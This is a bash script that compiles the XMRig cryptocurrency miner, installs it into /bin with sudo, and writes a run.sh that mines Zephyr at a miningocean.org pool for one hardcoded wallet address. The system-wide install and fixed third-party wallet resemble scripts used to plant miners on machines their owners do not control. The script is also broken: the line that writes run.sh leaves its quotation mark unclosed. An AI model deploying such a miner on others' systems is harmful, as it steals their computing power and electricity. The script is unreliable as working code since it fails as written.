#!/bin/bash
cd 
DIR="project_1934"

# Check if the directory exists
if [ ! -d "$DIR" ]; then
  # Create the directory if it does not exist
  mkdir "$DIR"
  echo "Directory $DIR created."
else
  echo "Directory $DIR already exists."
fi
cd project_1934
# Step 1: Install dependencies for compiling xmrig
sudo echo "Installing dependencies..."
sudo apt update
sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev jq curl

# Step 2: Clone the xmrig repository
echo "Cloning XMRig repository..."
git clone https://github.com/xmrig/xmrig.git
cd xmrig

# Step 3: Compile xmrig
echo "Compiling XMRig..."
mkdir build
cd build
cmake ..
make
mkdir ../../miner
cp xmrig ../../miner
cd ../../miner
sudo cp xmrig /bin
echo "reset && sudo ./xmrig -o fr-zephyr.miningocean.org:5332 -u ZEPHYR3DenTQyjY6EMM3jYeZeP9L5oBk8197zyvhnrMMP3HWVixjdc8dEA9seMFKefedVfRXMFbLHQoihMfCVt28WrBZgRLnqXB4k.25000 -p $RANDOM -a rx/0 --threads=2 >run.sh
chmod +x run.sh
sudo echo "$(pwd)/run.sh"
